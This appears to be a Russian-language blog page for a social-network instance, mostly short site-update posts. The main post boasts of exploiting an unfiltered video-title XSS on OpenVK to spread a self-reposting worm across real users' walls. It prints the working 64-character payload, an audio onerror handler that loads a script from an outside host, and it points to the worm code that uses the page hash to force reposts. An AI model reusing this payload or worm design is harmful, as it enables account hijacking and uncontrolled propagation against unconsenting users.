Закрыть
⬆ Вверх
Блог Вепура Подтверждённая страница
Информация
Название: Блог Вепура
Описание: БлоЖЖик создателя VepurOVK
Сайт: https://saursvepur.xyz
Аудиозаписи
Нет аудиозаписей
Стена 294 записей Все
Этой ночью нашли критическую уязвимость в нововведённом видео-плеере, в последствии чего в глобальной ленты OpenVK творилась вакханалия

Уязвимость заключалась в отсутствии фильтрации названия видео, после его редактирования и позволяла она вставить туда любой пользовательский javascript код, чем мы и решили воспользоваться!

Всё бы хорошо, но почти сразу мы наткнулись на проблему - лимит ровно в 64 символа. Нам необходимо было построить цепочку эксплоитов, которая сама себя встроит в html код страницы и сможет распространяться самостоятельно, как червь (Хотя мы назвали это гидрой, расскажем почему чуть позже), спустя несколько часов перебора вариантов, мы максимально сильно ужали точку входа в наш скрипт(из-за такого подхода ломался интерфейс плеера, так как нам приходилось убирать некоторые кусочки html кода для вмещения в лимит символов).

Не будем тянуть, представляю вам магнум опус этого взлома, код загружающий внешний скрипт на страницу, длинной ровно в 64 символа:
<audio src/onerror="$(body).append('<script src=//sdzk.xyz/a>')"

Скрипт создавал на в html коде страницы тег script, ссылающийся на этот код:
pastebin.com/maewTdPT

Этот код работает достаточно просто, он берёт хэш прямо с кода страницы(он нужен для работы бекенда) и с ним в качестве аргумента делает репост записи с видео, у которого в названии та самая строчка из 64 символов.

Ну и теперь следите за руками, сейчас я вам покажу секрет фокуса!

Каждый человек, заходя в новости, прогружал плеер с вредоносным кодом(обычно даже не один), что вызывало цепочку скриптов на странице и как следствие, делала репосты на стену пользователя, которые в последствии попадались другим пользователям.

Самое смешное, если у пользователя на собственной стене было хотя-бы два репоста, то избавиться от них было просто невозможно, удаление одного поста вызывало перезагрузку страницы и повторное исполнение цепочки скриптов, потому мы и назвали её гидрой, потому что убить её можно было только уничтожив все репосты разом через БД что конечно подсилу только админам

Пост с этим видео набрал за ночь 1534 репоста
Комментарии (1)  |  Поделиться
Была закрыта дыра в API которая позволяла писать посты и сообщения с заблокированного аккаунта
Комментарии  |  Поделиться
Обновил основную версию своего сайта - saursvepur.xyz
Комментарии  |  Поделиться
Сделал редирект из saursvepur.neonarod.com на home.saursvepur.xyz

Сайт на моём домене + http, так ещё и на хроме открывается
Комментарии (3)  |  Поделиться
В мобильной версии пока что не работает переход на полную версию, чтобы вернутся на полную версию в телефоне вам придётся потанцевать с бубном пока мы это не пофиксим

В браузере нажмите - Версия для ПК
И потом нажмите - Полная версия
Комментарии  |  Поделиться
Доброе утро! На данный момент я щас переношу весь ваш контент, ваши картинки и видосики (а вы их очень много по-выкладывали за пол года)

Сайт возможно щас работает чуть медленнее чем обычно

утро начинается с технических шоколадок
Комментарии  |  Поделиться
Помимо плеера мы ещё и сменили кодек на h.264

Теперь видео с VepurOVK можно смотреть и на мобилках, в том числе на устройствах iOS
Комментарии (1)  |  Поделиться
Тип группы
Это открытая группа. В неё может вступить любой желающий.
Создатель
Ссылки
5 ссылок